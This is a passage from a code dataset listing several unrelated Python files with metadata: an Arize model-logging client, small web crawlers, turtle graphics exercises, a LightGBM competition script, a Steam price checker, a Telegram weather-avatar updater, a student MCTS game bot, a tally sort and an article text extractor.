","sub_path":"study/王者荣耀/爬虫代码/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"80863873","text":"import time\nimport requests\nfrom typing import List, Dict\nfrom dataclasses import dataclass\nfrom arize import public_pb2 as pb\nfrom arize.utils.types import ModelTypes, Environments\n\n\n@dataclass(frozen=True)\nclass Schema:\n prediction_id_column_name: str\n feature_column_names: List[str]\n timestamp_column_name: str = None\n prediction_label_column_name: str = None\n prediction_score_column_name: str = None\n actual_label_column_name: str = None\n shap_values_column_names: Dict[str, str] = None\n\n\nclass Client:\n def __init__(\n self,\n api_key: str,\n organization_key: str,\n uri=\"https://api.arize.com/v1\"):\n self._api_key = api_key\n self._organization_key = organization_key\n self._files_uri = uri + \"/files\"\n\n def log(\n self,\n dataframe,\n path: str,\n model_id: str,\n model_version: str,\n batch_id: str,\n model_type: ModelTypes,\n environment: Environments,\n schema: Schema\n ):\n col_idx = {col: idx for idx, col in enumerate(dataframe.columns)}\n h = pb.FileHeader()\n\n if model_type is None:\n raise AttributeError(\"model_type is required\")\n\n if environment is None:\n raise AttributeError(\"environment is required\")\n\n if environment is Environments.TRAINING:\n if schema.prediction_label_column_name is None or schema.actual_label_column_name is None:\n raise AttributeError(\"both prediction and actual label must be specified for Training environment\")\n if schema.shap_values_column_names is not None:\n raise AttributeError(\"shap_values are not supported for Training environments\")\n h.environment = pb.FileHeader.Environment.TRAINING\n elif environment is Environments.VALIDATION:\n if schema.prediction_label_column_name is None or schema.actual_label_column_name is None:\n raise AttributeError(\"both prediction and actual label must be specified for Validation environment\")\n if schema.shap_values_column_names is not None:\n raise AttributeError(\"shap_values are not supported for Validation environments\")\n if batch_id is None:\n raise AttributeError(\"batch_id is required for Validation environment\")\n h.environment = pb.FileHeader.Environment.VALIDATION\n elif environment is Environments.PRODUCTION:\n h.environment = pb.FileHeader.Environment.PRODUCTION\n else:\n raise AttributeError(f\"unknown environment {environment}\")\n\n with open(path, \"wb\") as f:\n header = h.SerializeToString()\n f.write(len(header).to_bytes(8, \"big\", signed=False))\n f.write(header)\n\n current_time = int(time.time())\n for row in dataframe.to_numpy():\n if Environments.TRAINING == environment:\n msg = pb.PreProductionRecord()\n r = msg.training_record.record\n elif Environments.VALIDATION == environment:\n msg = pb.PreProductionRecord()\n msg.validation_record.batch_id = batch_id\n r = msg.validation_record.record\n else:\n msg = pb.Record()\n r = msg\n\n r.prediction_id = row[col_idx[schema.prediction_id_column_name]]\n r.model_id = model_id\n\n t = (\n int(row[col_idx[schema.timestamp_column_name]])\n if schema.timestamp_column_name is not None\n else current_time\n )\n\n for feature_cn in schema.feature_column_names:\n row_val = row[col_idx[feature_cn]]\n feature_val = r.prediction.features[feature_cn]\n if isinstance(row_val, (str, bool)):\n feature_val.string = row_val\n elif isinstance(row_val, int):\n feature_val.int = row_val\n elif isinstance(row_val, float):\n feature_val.double = row_val\n\n if schema.prediction_label_column_name is not None:\n r.prediction.timestamp.seconds = t\n r.prediction.model_version = model_version\n if model_type is ModelTypes.SCORE_CATEGORICAL:\n r.prediction.label.score_categorical.categorical = row[\n col_idx[schema.prediction_label_column_name]\n ]\n r.prediction.label.score_categorical.score = row[\n col_idx[schema.prediction_score_column_name]\n ]\n elif model_type is ModelTypes.CATEGORICAL:\n r.prediction.label.categorical = row[\n col_idx[schema.prediction_label_column_name]\n ]\n elif model_type is model_type.NUMERIC:\n r.prediction.label.numeric = row[\n col_idx[schema.prediction_label_column_name]\n ]\n elif model_type is model_type.BINARY:\n r.prediction.label.binary = row[\n col_idx[schema.prediction_label_column_name]\n ]\n\n if schema.actual_label_column_name is not None:\n if model_type is ModelTypes.CATEGORICAL:\n r.actual.label.categorical = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.NUMERIC:\n r.actual.label.numeric = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.BINARY:\n r.actual.label.binary = row[col_idx[schema.actual_label_column_name]]\n elif model_type is ModelTypes.SCORE_CATEGORICAL:\n if isinstance(schema.actual_label_column_name, tuple):\n r.actual.label.score_categorical.categorical = row[col_idx[schema.actual_label_column_name[0]]]\n r.actual.label.score_categorical.score = row[col_idx[schema.actual_label_column_name[1]]]\n else:\n r.actual.label.score_categorical.categorical = row[col_idx[schema.actual_label_column_name]]\n\n if schema.shap_values_column_names is not None:\n for feature_name, shap_values_cn in schema.shap_values_column_names.items():\n row_val = row[col_idx[shap_values_cn]]\n r.feature_importances.feature_importances[feature_name] = row_val\n\n msg_bytes = msg.SerializeToString()\n f.write(len(msg_bytes).to_bytes(8, \"big\", signed=False))\n f.write(msg_bytes)\n return self._post_file(path)\n\n def _post_file(self, path):\n with open(path, \"rb\") as f:\n return requests.post(\n self._files_uri,\n data=f,\n headers={\n \"authorization\": self._api_key,\n \"organization\": self._organization_key,\n },\n )\n","sub_path":"arize/pandas/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129588078","text":"# -*- coding: utf-8\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nreq = requests.get(\"http://www.keumyang.com/mall/KYDetail.ky?ps_goid=7942\")\nhtml = req.text\n# print(html)\nsoup = BeautifulSoup(html, \"html.parser\")\ninfo_ul = soup.select(\"div.detail_wine > div.detail_top > dl > dd > ul > li:nth-child(9) > span.txt\")\n\nprint(info_ul)\n\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129604422","text":"from swampy.TurtleWorld import *\nimport math\n\ndef square( turtle, length ):\n for i in range(4):\n fd( turtle, length )\n lt( turtle ) \n\ndef polygon( turtle, n, length ):\n for i in range(n):\n fd( turtle, length )\n lt( turtle, 360.0 / n ) \n\ndef circle( turtle, r ):\n n = 360\n alpha = 360.0 / n\n alpha = alpha * math.pi / 180.0\n length = math.sqrt( 2 * r * r * ( 1.0 - math.cos( alpha ) ) )\n polygon( turtle, n, length )\n\ndef arc( turtle, r, angle ):\n n = 360\n alpha = 360.0 / n\n alpha = alpha * math.pi / 180.0\n length = math.sqrt( 2 * r * r * ( 1.0 - math.cos( alpha ) ) )\n for i in range( angle ):\n fd( turtle, length )\n lt( turtle, 360.0 / n ) \n\nworld = TurtleWorld()\nbob = Turtle()\nbob.delay = 0.01\n\n#square( bob, 100 )\n\n#polygon( bob, 6, 100 )\n\n#circle( bob, 100 )\n\narc( bob, 100, 135 )\n\nwait_for_user()","sub_path":"swampy/mypolygon.py","file_name":"mypolygon.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"410000879","text":"from talkingdata.feat2 import *\nimport gc\nimport time\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport catboost as cb\nimport lightgbm as lgb\nfrom sklearn.metrics import roc_auc_score,log_loss\n\n\ninplace = False\ndata_path = 'C:/Users/cui/Desktop/python/talkingdata/data/'\n\n\ntrain = pd.read_hdf(data_path + 'train.hdf')\ntest = pd.read_hdf(data_path + 'test.hdf')\nsubmission = pd.DataFrame({'click_id':test.click_id})\ntest['is_attributed'] = 0\ndata = train.append(test.drop('click_id',axis=1))\ndata = pre_treatment(data,'sub_data')\ndel train,test\ngc.collect()\n\ntrain_feat = pd.DataFrame()\nfor date in [7,8,9]:\n train_feat_sub = make_feat(data[data['date']==date].copy(),\n data,'{}_sub'.format(date))\n train_feat_sub = train_feat_sub[train_feat_sub['is_attributed'] == 1].append(\n train_feat_sub[train_feat_sub['is_attributed'] == 0].sample(frac=0.1, random_state=66))\n train_feat = train_feat.append(train_feat_sub)\n del train_feat_sub\n gc.collect()\n\ntest_feat = make_feat(data[data['date']==10].copy(),\n data,'{}_sub'.format(10))\n\n\n\npredictors = [c for c in train_feat.columns if c not in ['app_count','channel_count',\n 'click_time','date','ip','is_attributed']]\n# predictors = ['app', 'device', 'os', 'channel', 'hour','ip_count','device_count','os_count',\n# 'ip_group_rank1','ip_group_rank2','ip_group_rank2']\n\nprint('开始训练...')\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc',\n 'max_depth': 8,\n 'num_leaves': 32,\n 'learning_rate': 0.01,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.95,\n 'bagging_freq': 5,\n 'verbose': 0,\n 'seed': 66,\n}\nlgb_train = lgb.Dataset(train_feat[predictors], train_feat.is_attributed)\nlgb_test = lgb.Dataset(test_feat[predictors], test_feat.is_attributed,reference=lgb_train)\n\ngbm = lgb.train(params,lgb_train,3000)\n\nprint('开始预测...')\npreds = gbm.predict(test_feat[predictors])\nsubmission['is_attributed'] = preds\nsubmission.to_csv('C:/Users/cui/Desktop/python/talkingdata/sub{}.csv'.format(\n datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False,float_format='%.4f')\n\n\n","sub_path":"talkingdata/submission_all.py","file_name":"submission_all.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433523758","text":"from urllib.request import urlopen\nimport json\n\nwhile True:\n id_game= str(input(\"Enter game id:\"))\n if id_game.lower() == \"exit\":\n break\n elif id_game.isdigit() == False:\n print(\"Enter game id!\")\n else:\n url = f\"https://store.steampowered.com/api/appdetails?appids={id_game}&cc=vn\"\n\n #1. Open connection\n conn = urlopen(url)\n\n #2. Read data\n raw_data = conn.read()\n\n #3. Decode data\n text = raw_data.decode(\"utf-8\")\n data = json.loads(text)\n\n if data[id_game][\"success\"]:\n sub_info = data[id_game][\"data\"][\"package_groups\"][0][\"subs\"]\n for i in sub_info:\n game_name = i[\"option_text\"]\n price = (int(i[\"price_in_cents_with_discount\"])/100) * 0.78\n print(game_name)\n print(\"Gia ban\", price)\n print(\"**********************\")\n else:\n print(\"Sai ma game\")\n","sub_path":"session5/aqi.py","file_name":"aqi.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650923780","text":"#!/usr/bin/env python\n# -- coding: utf-8 --\n\nfrom telethon import TelegramClient, sync\nfrom telethon.tl.functions.photos import UploadProfilePhotoRequest, DeletePhotosRequest\nimport requests\nimport socks\nfrom PIL import ImageDraw, Image, ImageFont\nimport time\nimport os\n\ncelsius = '°'\nTEMP_PATH = 'temperature_images'\nREADY_PATH = 'ready_images'\nWEATHER_PATH = 'weather_images'\n\nlocation = 498817 # Saint-Petersburg\nopenweather_api_key = 'abcdefghi'\n\ntelegram_api_id = 1234567\ntelegram_api_hash = 'abcdefghi'\n\nFONT_SIZE = 80\nTEXT_Y_POSITION = 80\n\n#proxy options\n#w = input('Which: ')\n\nhost = '127.0.0.1' # a valid host\nport = 9050 # a valid port\nproxy = (socks.SOCKS5, host, port)\n\nicons = [\"01d\", \"02d\", \"03d\", \"04d\", \"09d\", \"10d\", \"11d\", \"13d\", \"50d\", \"01n\", \"02n\", \"03n\", \"04n\", \"09n\", \"10n\", \"11n\", \"13n\", \"50n\"]\n\n# create all avatars\nprint('Start of temperature images generation')\nfor temperature in range(-99, 99, 1):\n raw = Image.new('RGBA', (200, 200), \"gray\")\n parsed = ImageDraw.Draw(raw)\n length = len(str(temperature))\n if length == 1:\n x_start = 70\n if length == 2:\n x_start = 40\n if length == 3:\n x_start = 30\n\n font = ImageFont.truetype(\"arial.ttf\", FONT_SIZE)\n parsed.text((x_start, TEXT_Y_POSITION), f'{temperature}{celsius}', align=\"center\", font=font)\n raw.save(f'{TEMP_PATH}/{temperature}.png', \"PNG\")\nprint('Generating finished')\n\nprint('Beginning icons download')\nfor ic in icons:\n url = f'http://openweathermap.org/img/wn/{ic}@2x.png'\n r = requests.get(url)\n with open(f'{WEATHER_PATH}/{ic}.png', 'wb') as f:\n f.write(r.content)\n r.raise_for_status()\nprint('Download successfull')\n\nprint('Generate_final_images')\nfor temperature_file in os.listdir(f'{TEMP_PATH}'):\n if temperature_file.endswith(\".png\"):\n new_im = Image.open(f'{TEMP_PATH}/{temperature_file}')\n for weather_file in os.listdir(f'{WEATHER_PATH}'):\n if weather_file.endswith(\".png\"):\n im = Image.open(f'{WEATHER_PATH}/{weather_file}')\n test_img = Image.composite(im, new_im, im)\n temperature_file = temperature_file.strip('.png')\n weather_file = weather_file.replace('.png','')\n test_img.save(f'{READY_PATH}/{temperature_file}_{weather_file}.png')\nprint('done')\n\ndef get_temperature(weather_data):\n return round(weather_data['main']['temp'])\ndef get_conditions(weather_data):\n weath_array = weather_data['weather']\n weath_dict = weath_array[0]\n return weath_dict['icon']\n\n\ndef get_weather(location, api_key):\n url = f'https://api.openweathermap.org/data/2.5/weather?id={location}&units=metric&appid={api_key}'\n r = requests.get(url)\n return r.json()\n\n\nclient = TelegramClient('1', telegram_api_id, telegram_api_hash)\n#client = TelegramClient('anon', telegram_api_id, telegram_api_hash, proxy=(socks.SOCKS5, '127.0.0.1', 9050))\nclient.connect()\n\n\nclient.start()\n\nlast_temperature = -274\n\nwhile True:\n weather_data = get_weather(location, openweather_api_key)\n temperature = get_temperature(weather_data)\n conditions = get_conditions(weather_data)\n print(last_temperature, temperature)\n if temperature == last_temperature:\n time.sleep(15 * 60)\n continue\n\n client(DeletePhotosRequest(client.get_profile_photos('me')))\n file = client.upload_file(f'{READY_PATH}/{temperature}_{conditions}.png')\n client(UploadProfilePhotoRequest(file))\n last_temperature = temperature\n time.sleep(15 * 60)","sub_path":"change_avatar.py","file_name":"change_avatar.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"112234328","text":"\nfrom mcts_node import MCTSNode\nfrom random import choice\nimport random\nfrom timeit import default_timer as time\nfrom math import sqrt, log\n#how do we improve our algorithm?\n#why does backpropagate not work?\n#The flip(i.e how do we use the function for the opponent)\n#is rollout correct?\nnum_nodes = 10\nexplore_faction = 2.\n\nROLLOUTS = 1000\nMAX_DEPTH = 5\n\ndef traverse_nodes(node, board, state, identity):\n \"\"\" Traverses the tree until the end criterion are met.\n Args:\n node: A tree node from which the search is traversing.\n board: The game setup.\n state: The state of the game.\n identity: The bot's identity, either 'red' or 'blue'.\n Returns: A node from which the next stage of the search can proceed.\n \"\"\"\n\n # For first node, will pick root because it is also leaf node\n # UCB - X is how many times won over how many times played (visited)\n # x = node.wins/node.visits (if visits != 0)\n # C is hardcoded, we can choose. Lower C value is exploitation, higher is exploration.\n # Try C = 2\n # Use highest UCB to choose each node down a path until leaf_node is reached\n turn = identity\n current = node\n # index = 0\n # while len(current.child_nodes) != 0:\n # for action in current.child_nodes:\n # current = current.child_nodes[action]\n # print(\"index: \", index)\n # print(\"action: \", action)\n # index += 1\n ucb = {}\n\n temp = node\n max_ucb = 0\n\n i = 0\n updatestate = state\n # a = len(current.child_nodes)\n while len(current.child_nodes) != 0:\n for action in current.child_nodes:\n # print(i)\n i = i +1\n if current.child_nodes[action].visits == 0 :\n #print(len(current.child_nodes))\n child = current.child_nodes[action]\n exploitation = child.wins/child.visits\n\n exploration = 2 * (sqrt((2 * log(child.parent.visits))/ child.visits))\n\n ucb[child] = exploitation + exploration\n\n if ucb[child] > max_ucb:\n max_ucb = ucb[child]\n temp = child \n \n if turn == 1:\n turn = 2\n elif turn == 2:\n turn = 1\n current = current.child_nodes[action]\n updatestate = board.next_state(updatestate, action)\n\n\n leaf_node = current\n\n return leaf_node\n # Hint: return leaf_node\n\n\n\ndef expand_leaf(node, board, state):\n \"\"\" Adds a new leaf to the tree by creating a new child node for the given node.\n Args:\n node: The node for which a child will be added.\n board: The game setup.\n state: The state of the game.\n Returns: The added child node.\n \"\"\"\n\n # Create new node from parent node\n # Can choose action randomly\n # Action list comes from node.untried_actions?\n parent_node = node \n actions1 = board.legal_actions(state)\n state2 = board.next_state(state, actions1[0])\n actions2 = board.legal_actions(state2)\n #print(actions[0])\n # print(\"this is the length before \",len(parent_node.child_nodes) )\n child_node = MCTSNode(parent=parent_node, parent_action=actions1[0], action_list=board.legal_actions(state2))\n try:\n parent_node.child_nodes[actions2[0]] = child_node\n except: \n return child_node\n parent_node.child_nodes[actions1[0]] = child_node\n #print(\"it broke\", actions2, \"also :\", actions1)\n # print(\"this is the length after\",len(parent_node.child_nodes) )\n return child_node\n\n \n # Hint: return new_node\n\n\ndef rollout(board, state):\n \"\"\" Given the state of the game, the rollout plays out the remainder randomly.\n Args:\n board: The game setup.\n state: The state of the game.\n return state/ board at the end - see who won\n \"\"\"\n\n # Return who won this game (board or state)\n # board.is_ended(state) == true when over\n # Same as Rollout bot, can basically copy/paste\n # pass\n if not board.is_ended(state):\n prevmov = board.legal_actions(state)[0]\n nextmove = prevmov\n predistance = float('inf')\n while not board.is_ended(state):\n predistance = float('inf')\n\n for move in board.legal_actions(state):\n if move == prevmov:\n\n continue\n x1 = move[2]\n x2 = prevmov[2]\n y1 = move[3]\n y2 = prevmov[3]\n if prevmov[1]!= move[1] or prevmov[0]!= move[0]:\n distance = sqrt((x1 - x2) ** 2 + (y2 - y1) ** 2 + (move[0] - prevmov[0]) ** 2 + (move[1] - prevmov[1]) ** 2) * 0.5\n else:\n distance = sqrt((x1 - x2) ** 2 + (y2 - y1) ** 2) * 0.5\n \n if predistance >distance:\n predistance = distance\n nextmove = move\n prevmov = nextmove\n state = board.next_state(state,nextmove)\n\n return board.current_player(state)\n\n\ndef backpropagate(node, won):\n \"\"\" Navigates the tree from a leaf node to the root, updating the win and visit count of each node along the path.\n \n Args:\n node: A leaf node.\n won: An indicator of whether the bot won or lost the game.\n \"\"\"\n if node.parent == None:\n node.visits += 1\n node.wins += won\n return node\n node.wins += won\n node.visits += 1\n\n return backpropagate(node.parent, won)\n\n\ndef think(board, state):\n \"\"\" Performs MCTS by sampling games and calling the appropriate functions to construct the game tree.\n Args:\n board: The game setup.\n state: The state of the game.\n Returns: The action to be taken.\n \"\"\"\n identity_of_bot = board.current_player(state)\n root_node = MCTSNode(parent=None, parent_action=None, action_list=board.legal_actions(state))\n i = 0\n start = time()\n currenttime = 0\n\n for step in range(num_nodes):\n # Copy the game for sampling a playthrough\n sampled_game = state\n times = time()\n currenttime = times -start\n # Start at root\n #print(\"this is the length : \",len(root_node.child_nodes))\n\n leaf_node = traverse_nodes(root_node, board, sampled_game, identity_of_bot)\n child_node = expand_leaf(leaf_node, board, state)\n if len(child_node.untried_actions) == 0:\n print(\"drawsss\")\n bestAction = child_node.parent_action\n break\n parent_node = child_node.parent\n actions = parent_node.untried_actions\n wins = rollout(board, board.next_state(state, actions[0])) \n\n temp = child_node\n temp.visits += 1\n temp.wins += wins\n while temp.parent !=None:\n temp = temp.parent\n temp.visits += 1\n temp.wins += wins\n root_node = temp\n #print(currenttime)\n high=-1\n #print(\"test2\")\n for node in root_node.child_nodes:\n temp2=root_node.child_nodes[node]\n if ((temp2.wins/temp2.visits)>high) and node!=None:\n score=(temp2.wins/temp2.visits)\n best=node\n\n return best","sub_path":"pa3/mcts_modified.py","file_name":"mcts_modified.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"145910491","text":"import acm\nael_variables = [\n['vertical_shift', 'Vertical Shift (%)', 'double', None, None, 1, 0, '', None, True],\n['tilt', 'Tilt (%)', 'double', None, None, 1, 0, '', None, True]\n]\n\ndef ael_main_ex( parameters, dictExtra ):\n params = acm.FNamedParameters()\n name = str('')\n vertical = parameters['vertical_shift']\n tilt = parameters['tilt']\n if (vertical != 0.0):\n name = name + str(vertical) + '% vertical'\n if (tilt != 0.0):\n name = name + str(' & ') + str(tilt) + '% tilt'\n elif (tilt != 0.0):\n name = name + str(tilt) + '% tilt'\n params.Name(name)\n params.AddParameter( 'vertical_shift', parameters['vertical_shift'] )\n params.AddParameter( 'tilt', parameters['tilt'] )\n vec = acm.FArray()\n vec.Add( params )\n return vec\n","sub_path":"Extensions/Default/FPythonCode/baseCorrelationScenarioGetParams.py","file_name":"baseCorrelationScenarioGetParams.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"157909712","text":"from Bio import SeqIO\nfrom Bio.SeqUtils import GC\n\nfile = str(input(\"File: \"))\nreads = list(SeqIO.parse(file, \"fasta\"))\n\nif len(reads[0].seq)%3 == 1:\n\treads[0].seq += 'NN'\nelif len(reads[0].seq)%3 == 2:\n\treads[0].seq += 'N'\n\nrf1 = reads[0].seq\nrf2 = reads[0].seq[1:len(reads[0].seq)-2]\nrf3 = reads[0].seq[2:len(reads[0].seq)-1]\n#rf4 = reads[0].seq.reverse_complement()\n#rf5 = reads[0].seq[2:len(reads[0].seq)-1].reverse_complement()\n#rf6 = reads[0].seq[1:len(reads[0].seq)-2].reverse_complement()\n\nseqs1 = rf1.translate()\nseqs2 = rf2.translate()\nseqs3 = rf3.translate()\n#seqs4 = rf4.translate()\n#seqs5 = rf5.translate()\n#seqs6 = rf6.translate()\n\nlstart1 = []\nlstart2 = []\nlstart3 = []\n#lstart4 = []\n#lstart5 = []\n#lstart6 = []\nc1 = 0\nc2 = 0\nc3 = 0\n#c4 = 0\n#c5 = 0\n#c6 = 0\nn1 = 0\nn2 = 0\nn3 = 0\n#n4 = 0\n#n5 = 0\n#n6 = 0\n\ndef locs(x, lstart, c):\n\tplength = 0\n\tstartstop = {}\n\tfor i in range(0, len(x)):\n\t\tif plength == 0:\n\t\t\tstart = int(i)\n\t\tif x[i] != '*':\n\t\t\tplength += 1\n\t\telif x[i] == '*':\n\t\t\tif plength > 100:\n\t\t\t\tlstart.append(start)\n\t\t\t\tstartstop[lstart[c]] = int(i)\n\t\t\t\tc += 1\n\t\t\tplength = 0\n\treturn startstop\n\ndef prot(x, lstart, n):\n\tsequences = {}\n\tproteins = x.split('*')\n\tfor i in range(0, len(proteins)):\n\t\tif len(proteins[i]) > 100:\n\t\t\tsequences[lstart[n]] = ''.join(proteins[i])\n\t\t\tn += 1\n\treturn sequences\n\nlocations1 = locs(seqs1, lstart1, c1)\nproteins1 = prot(seqs1, lstart1, n1)\n\nlocations2 = locs(seqs2, lstart2, c2)\nproteins2 = prot(seqs2, lstart2, n2)\n\nlocations3 = locs(seqs3, lstart3, c3)\nproteins3 = prot(seqs3, lstart3, n3)\n\n#locations4 = locs(seqs4, lstart4, c4)\n#proteins4 = prot(seqs4, lstart4, n4)\n\n#locations5 = locs(seqs5, lstart5, c5)\n#proteins5 = prot(seqs5, lstart5, n5)\n\n#locations6 = locs(seqs6, lstart6, c6)\n#proteins6 = prot(seqs6, lstart6, n6)\n\nprint()\nprint('In reading frame 1:')\nprint(f'The proteins longer than 100 amino acids are: {proteins1}')\nprint(f'The endpoints of the proteins are: {locations1}')\nprint()\nprint('Reading frame 2 is adjusted by +1. In reading frame 2:')\nprint(f'The proteins longer than 100 amino acids are: {proteins2}')\nprint(f'The endpoints of the proteins are: {locations2}')\nprint()\nprint('Reading frame 3 is adjusted by +2. In reading frame 3:')\nprint(f'The proteins longer than 100 amino acids are: {proteins3}')\nprint(f'The endpoints of the proteins are: {locations3}')\nprint()\n#print('Reading frame 4 is the reverse complement of reading frame 1. In reading frame 4:')\n#print(f'The proteins longer than 100 amino acids are: {proteins4}')\n#print(f'The endpoints of the proteins are: {locations4}')\n#print()\n#print('Reading frame 5 is the reverse complement of reading frame 1 adjusted by +1. In reading frame 5:')\n#print(f'The proteins longer than 100 amino acids are: {proteins5}')\n#print(f'The endpoints of the proteins are: {locations5}')\n#print()\n#print('Reading frame 6 is the reverse complement of reading frame 1 adjusted by +2. In reading frame 6:')\n#print(f'The proteins longer than 100 amino acids are: {proteins6}')\n#print(f'The endpoints of the proteins are: {locations6}')\n#print()\n","sub_path":"rvokkarne/bio-translation.py","file_name":"bio-translation.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529569228","text":"def find_min(number_list):\n lowest_num = number_list[0]\n for num in number_list:\n if num < lowest_num:\n lowest_num = num\n return lowest_num\n\ndef tally_sort(num_list):\n min_num = find_min(num_list)\n ind_list = []\n sorted_list = []\n filler_list = []\n for num in range(len(num_list)):\n num_list[num]-=min_num\n ind_list.append(0)\n print(num_list)\n print(ind_list)\n for ind in range(len(ind_list)):\n for num in range(len(num_list)):\n if ind == num_list[num]:\n ind_list[ind]+=1\n for tallies in range(len(ind_list)):\n if ind_list[tallies] > 0:\n for num in range(ind_list[tallies]):\n sorted_list.append(ind_list.index(ind_list[tallies]))\n\n\n\n \n \n print(num_list)\n print(ind_list)\n print(sorted_list)\n \n \n \ntally_sort([2, 5, 2, 3, 8, 6, 3])\n","sub_path":"tally_sort.py","file_name":"tally_sort.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"109781141","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Рузэль Давлетяров (ruzelapp@yandex.ru)\"\n\nimport os\nimport sys\nimport textwrap\nimport configparser\nfrom urllib.request import urlopen\nfrom urllib.parse import urlparse\n\n# Cторонний модуль - pip install beautifulsoup4\nfrom bs4 import BeautifulSoup\n\n\nif __name__ == '__main__':\n\n url = str(sys.argv[1])\n urlpars = urlparse(url)\n domain = urlpars.netloc\n config = configparser.ConfigParser()\n config.read('config.ini','utf8')\n\n # Определяем путь\n directoryname = os.getcwd() #Если мой код, будет запущен из другой директории, то результат будет тут\n headpath = os.path.join(directoryname,str(urlpars.netloc)) \n tailpath = urlpars.path.replace('/',os.sep) \n path = headpath + tailpath\n\n # Создаем каталоги\n try:\n os.makedirs(path) \n except FileExistsError: #Подовлям исключение, т.к некоторые каталоги могли быть созданы пред. работой\n pass\n\n #Возня с кодировками \n try:\n data = urlopen(url).read().decode('utf8') \n except UnicodeDecodeError:\n try:\n data = urlopen(url).read().decode('cp1251')\n except UnicodeDecodeError:\n data = urlopen(url).read().decode('utf-8','ignore')\n \n #html.parser - стандартный парсер из std Python\n soup = BeautifulSoup(data, \"html.parser\")\n \n #Записываем заголовок\n source = \"\\n\".join(textwrap.wrap(soup.h1.string, width=80, replace_whitespace=False)) + \"\\n\\n\" \n \n #Проход по всем параграфам\n for i in soup.find_all('p'):\n if domain in config: #Если шаблон задан в config.ini\n confset = set(config[domain]['class'].split(','))\n for paren in i.parents:\n if paren.attrs.get('class') != None:\n parentset = set(paren.attrs.get('class'))\n if not parentset.issubset(confset): #Если все классы из атрибута имеются в шаблоне\n lcl_data = i.get_text()\n for link in i.children:\n if link.name == \"a\": #Тут обрабатываем ссылки\n lcl_data = lcl_data.replace(link.text, link.text + ' [' + link['href'] + ']')\n source += \"\\n\".join(textwrap.wrap(lcl_data, width=80, replace_whitespace=False)) + '\\n\\n'\n break \n else:\n lcl_data = i.get_text()\n for link in i.children:\n if link.name == \"a\":\n lcl_data = lcl_data.replace(link.text, link.text + ' [' + link['href'] + ']') \n\n source += \"\\n\".join(textwrap.wrap(lcl_data, width=80, replace_whitespace=False)) + '\\n\\n'\n \n\n # Записываем результат в\n f1 = open(os.path.join(path,'index.txt'), 'w+', encoding=\"utf8\")\n f1.write(source)\n f1.close() \n \n","sub_path":"appreadability.py","file_name":"appreadability.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90603056","text":"# 剑指 Offer 14- II. 剪绳子 II\r\n# 给你一根长度为 n 的绳子,请把绳子剪成整数长度的 m 段(m、n都是整数,n>1并且m>1),每段绳子的长度记为 k[0],k[1]...k[m - 1] 。\r\n# 请问 k[0]*k[1]*...*k[m - 1] 可能的最大乘积是多少?例如,当绳子的长度是8时,我们把它剪成长度分别为2、3、3的三段,此时得到的最大乘积是18。\r\n# 答案需要取模 1e9+7(1000000007),如计算初始结果为:1000000008,请返回 1。\r\nclass Solution:\r\n # 5.01 21.45\r\n def cuttingRope(self, n: int) -> int:\r\n # dp[i]代表长度为i所得的最大乘积\r\n dp = [0 for _ in range(n + 1)]\r\n for i in range(2, n + 1):\r\n for j in range(1, i):\r\n dp[i] = max(dp[i], max(j * (i - j), j * dp[i - j]))\r\n return dp[n] % (1000000007)\r\n\r\n # 优秀解答\r\n def cuttingRope(self, n: int) -> int:\r\n sm = [0, 1, 1, 2, 4]\r\n if n <= 4:\r\n return sm[n]\r\n a = n // 3\r\n b = n % 3\r\n if b == 0:\r\n return 3 ** a % 1000000007\r\n else:\r\n return 3 ** (a + b - 2) * (6 - 2 * b) % 1000000007\r\n\r\n # 优秀解答\r\n def cuttingRope(self, n: int) -> int:\r\n\r\n if n <= 3: return n - 1\r\n\r\n res = 1\r\n\r\n while n > 4:\r\n n = n - 3\r\n res = res * 3 % 1000000007\r\n\r\n return res * n % 1000000007","sub_path":"pySrc/CutTheRope2.py","file_name":"CutTheRope2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"62974214","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 23 10:12:49 2017\n\n@author: Harshvardhan Gazula\n@notes : Contains a variant of the single-shot regression proposed by Eswar.\n Drop site specific 